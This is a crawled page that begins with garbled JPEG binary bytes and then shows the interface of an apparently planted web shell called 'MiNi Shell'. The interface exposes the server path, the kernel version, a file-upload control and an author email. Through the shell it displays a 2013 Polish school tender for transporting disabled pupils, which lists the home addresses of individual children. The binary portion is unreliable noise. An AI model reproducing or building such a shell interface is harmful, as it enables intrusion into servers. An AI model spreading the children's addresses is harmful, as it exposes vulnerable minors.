JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/283230-N-2013.html

<p class="kh_header"><b>Zaborze: Dowóz uczniów niepełnosprawnych z terenu Gminy Oświęcim do placówek oświatowych w roku szkolnym 2013 / 2014</b><br>
<b>Numer ogłoszenia: 283230 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Gminne nr 2 im. Komisji Edukacji Narodowej , ul. Jezioro 2, 32-600 Zaborze, woj. małopolskie, tel. 0-33 8440219, faks 0-33 8440219.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA BUDŻETOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów niepełnosprawnych z terenu Gminy Oświęcim do placówek oświatowych w roku szkolnym 2013 / 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie na rzecz Zamawiającego usługi polegającej na organizacji dowozu dzieci niepełnosprawnych, zamieszkałych na terenie gminy Oświęcim, na trasie dom - szkoła/ - dom wraz z opieką podczas przewozu do szkół specjalistycznych placówek oświatowych oraz ich odwozie po zajęciach szkolnych w okresie od 02.09.2013 r. - 27.06.2014 r. Zamawiający dokonał podziału zamówienia na części:
część 1 - dowóz dzieci słabosłyszących do  Zespołu Szkolno - Przedszkolnego dla dzieci Niedosłyszących i Słabosłyszących w Katowicach, ul. Grażyńskiego 17.w zakresie:
- 1 dziecko z miejsca zamieszkania tj Broszkowice ul. Zgodna 6; 32 - 600 Oświęcim 
- 1dziecko z miejsca zamieszkania tj. ul Bagienna 3; 32 - 615 Grojec 
- 1dziecko z miejsca zamieszkania tj. ul. Beskidzka 48; 32 - 615 Grojec 

W zakresie tej części zamówienia usługa przewozu ma być świadczona środkiem  transportu sprawnym technicznie, przystosowanym do przewozu dzieci niepełnosprawnych   spełniającym wymogi bezpieczeństwa i Kodeksu drogowego. 
Część 2: 
1) dowóz dzieci do Specjalnego Ośrodka  Szkolno-Wychowawczego 
    w Oświęcimiu, ul. Obozowa 40  w zakresie:
      -     1 dziecko z miejsca zamieszania Łazy, ul. Puściny 2; 32 - 615 Grojec
      -     1 dziecko z miejsca zamieszkania ul. Skotnica 61; 32 - 615 Grojec
      -     1 dziecko z miejsca zamieszkania Zaborze, ul. Cisowa 2; 32 - 600
            Oświęcim
      -     1 dziecko z miejsca zamieszkania Zaborze, ul. Pod Dębem 27; 
            32 - 600 Oświęcim
      -     1 dziecko z miejsca zamieszkania Zaborze, ul. Węgielnik 33; 32 - 600
            Oświęcim
      2)  dowóz dziecka do  Miejskiego Przedszkola Nr 14 w Oświęcimiu, 
           ul. Broniewskiego 12 w zakresie:
      -     1 dziecko z miejsca zamieszkania Zaborze,  ul. Borowiec 46a; 
            32 - 600 Oświęcim 

W zakresie części 2 zamówienia usługa przewozu ma być świadczona środkami  transportu sprawnymi technicznie, przystosowanymi  do przewozu dzieci niepełnosprawnych  spełniającymi wymogi bezpieczeństwa i Kodeksu drogowego.        W szczególności wykonawca powinien posiadać minimum 2 pojazdy samochodowe do przewozu osób niepełnosprawnych, w tym 1 pojazd wyposażony w windę z podnośnikiem elektrycznym umożliwiającym przewóz szóstki dzieci  w tym 1 na wózku inwalidzkim wraz z opiekunem. ( zgodnie z ilością miejsc wpisaną do dowodu rejestracyjnego pojazdu).
3.Dzieci mają być dowiezione do placówki zgodnie z ustalonym planem lekcyjnym i odwiezione po zajęciach lekcyjnych. 
4.Samochody wożące dzieci muszą być ubezpieczone oraz dostosowane technicznie do potrzeb wożących niepełnosprawnych uczniów z możliwością posadzenia dziecka w foteliku samochodowym dostosowanym do wieku i wzrostu dziecka zgodnie z ustawą z dnia 20 czerwca 1997 r. - prawo o ruchu drogowym (tj. Dz. U. z 2012 r. poz. 1137 ze zm.). 
5.Przewóz dzieci odbywać się będzie od poniedziałku do piątku każdego tygodnia, w dni nauki szkolnej z wyjątkiem świąt i innych ustawowo wolnych dni od pracy, a także przerw w realizacji zajęć dydaktyczno-wychowawczych (ferie zimowe, letnie oraz zimowa i wiosenna przerwa świąteczna) zgodnie z organizacją pracy w danej szkole z zastrzeżeniem ust. 6.
6.W indywidualnych przypadkach w ciągu roku szkolnego Wykonawca może świadczyć usługę przewozu  w inny dzień (tj. odpracowanie w  sobotę dnia wolnego).
7.W przypadku odpracowania dnia wolnego przez szkoły, szczegóły należy ustalić  z dyrektorem właściwej placówki oświatowej.
8.Harmonogram dowozu uczniów zostanie dostosowany do podziałów godzin obowiązujących w danej placówce,
9.Zamawiający informuje, że ilość dni przewozu dziecka w okresie realizacji zamówienia wynosi ok.196 dni.
10.Zamawiający zastrzega, iż podana ilość dni przewozu, o których mowa wyżej  jest wielkością orientacyjną i może ulec zmniejszeniu. Z tego tytułu Wykonawcy nie będą przysługiwać  żadne roszczenia, w tym roszczenia finansowe. 
11.Wykonawca otrzyma wynagrodzenie wyłącznie za przewozy zrealizowane.
12.Zamawiający zastrzega możliwość zmiany liczby kursów i liczby dzieci, godzin dowozu    i odwozu.
13.Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych dzieci.
14.Wykonawca ponosi odpowiedzialność i wszelkie koszty z tytułu strat materialnych oraz następstw nieszczęśliwych wypadków powstałych w związku z realizacją  przedmiotu umowy.
15.Wykonawca winien posiadać opłaconą polisę ubezpieczeń OC i NW (odpowiedzialności cywilnej i ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów),     a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związane z przedmiotem zamówienia na cały okres realizacji zamówienia.
16.W ramach przedmiotowego zamówienia Wykonawca będzie zobowiązany do kompleksowej organizacji w/w przewozów, w tym także do skontaktowania się  z rodzicami lub opiekunami prawnymi dziecka przed rozpoczęciem przewozów w celu uzyskania od nich informacji niezbędnych dla prawidłowej realizacji przewozów (tj. godziny odbioru dziecka z domu z  i z placówki) oraz przekazania im numerów telefonów umożliwiających bezproblemowy kontakt z Wykonawcą.
17.Wszystkie czynności organizacyjne Wykonawcy w zakresie przygotowania do świadczenia usługi przewozu winny zakończyć się najpóźniej na 2 dni przed wyznaczonym terminem rozpoczęcia przewozów.
18.Wykonawca zobowiązany jest do świadczenia usług objętych zamówieniem z należytą starannością, w szczególności do:
1)terminowego wykonania wszystkich czynności organizacyjnych w zakresie przygotowania realizacji przewozów,
2)zapewnienia prawidłowej opieki przewożonym dzieciom uwzględniającej stopień i rodzaj ich  niepełnosprawności, w tym wykonywania przewozów przez osoby posiadające uprawnienia do przewozu osób niepełnosprawnych, nie karane i przeszkolone z udzielania pierwszej pomocy przedmedycznej,
3)zapewnienia pomocy przy wsiadaniu dziecka do samochodu i wysiadaniu dziecka z samochodu,
4)zapewnienia odpowiedniego standardu przewozu  osób, przez który należy rozumieć: brak oparów paliwa we wnętrzu samochodu, czyste wnętrze, ilość osób przewożonych zgodną z określonymi normami technicznymi dla danego rodzaju pojazdu,
5)zapewnienia możliwości przejazdu razem z dzieckiem jego rodzica/opiekuna prawnego w celu sprawowania przez niego osobiście opieki nad dzieckiem podczas dowozu,
6)zapewnienia bezproblemowego kontaktu telefonicznego ze sobą rodziców  
i opiekunów prawnych dziecka, 
7)ponoszenia wszystkich kosztów  związanych z eksploatacją pojazdu 
i uiszczania opłat oraz kar nałożonych na niego przez właściwe organy,
19.Podczas realizacji usługi Wykonawca zobowiązany jest do przestrzegania poniższych zasad:
1)czas oczekiwania ucznia na odebranie go z placówki po skończeniu zajęć - max 30 minut,
2)kierowca  zobowiązany jest do powiadomienia rodziców o opóźnieniach (kontakt telefoniczny kierowcy z rodzicem lub opiekunem niezwłocznie w czasie wystąpienia opóźnienia lub innego zdarzenia),
20.W razie wystąpienia  przejściowych okoliczności  niezależnych od Wykonawcy a uniemożliwiających mu świadczenie usług objętych  umową, Wykonawca we własnym zakresie, na własny koszt zapewni pojazd zastępczy o parametrach nie gorszych niż jego pojazd oraz osoby, które w jego imieniu i za pisemną zgodą Zamawiającego będą świadczyć usługi. Zapewnienie zastępczego pojazdu nastąpi w taki sposób, aby nie powodować opóźnień czasowych kursu i nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych dzieci. W przypadku  gdy Wykonawca nie zapewni pojazdu zastępczego, kierowcy, opiekuna zamawiający zleci osobie trzeciej wykonanie zastępcze usługi  i naliczy Wykonawcy karę za nienależyte wykonanie obowiązków umownych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie trzech lat od udzielenia zamówienia podstawowego, udzielnie dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 30% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień   o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca w tym zakresie musi posiadać uprawnienia licencję na wykonywanie krajowego transportu  drogowego osób zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2007 Nr 125 poz. 874 z późn. zm.), 
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana godnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach, o których mowa w  części IX SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie części 1 zamówienia:
wykonawca musi dysponować min. 1 środkiem transportu  umożliwiającym przewóz trójki dzieci wraz z opiekunem Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.
W zakresie części 2 zamówienia 
Wykonawca musi dysponować minimum 2 pojazdami samochodowymi do przewozu osób niepełnosprawnych, w tym 1 pojazd wyposażony w windę       
 z podnośnikiem elektrycznym umożliwiający przewóz szóstki dzieci w tym 1 na wózku inwalidzkim wraz z opiekunem (zgodnie  z ilością miejsc wpisaną do dowodu rejestracyjnego pojazdu).
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana godnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach, o których mowa w  części IX SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli Wykonawca ustanowił pełnomocnika w w/w zakresie;
2)Wypełniony i podpisany przez Wykonawcę formularz ofertowy sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę umowy w następujących przypadkach: 
1) zmianie może ulec zakres przedmiotu umowy w przypadku gdy nastąpi zmiana liczby kursów i liczby dzieci, godzin dowozu i odwozu;
2) zmiana przepisów prawa dotyczących przedmiotu zamówienia
3) zmianę wynagrodzenia  w przypadku ustawowej zmiany  podatku od towarów i usług VAT  w okresie obowiązywania umowy, 
4) z powodu okoliczności  siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez  czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu osób lub grożącego powstaniem szkody  w znacznych rozmiarach,
5)z powodu działań osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron.
6)zmniejszenia ilości dni, w których będzie świadczona usługa przewozu w stosunku do orientacyjnej ilości podanej w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.g2zaborze.republika.pl oraz www.oswiecim-gmina.pl ( zakładka zamówienia publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum Gminne Nr 2 im. Komisji Edukacji Narodowej w Zaborzu ul. Jezioro 2; 32 - 600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 09:00, miejsce: w sekretariacie Gimnazjum Gminnego Nr 2 im. Komisji Edukacji Narodowej w Zaborzu ul. Jezioro 2; 32 - 600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com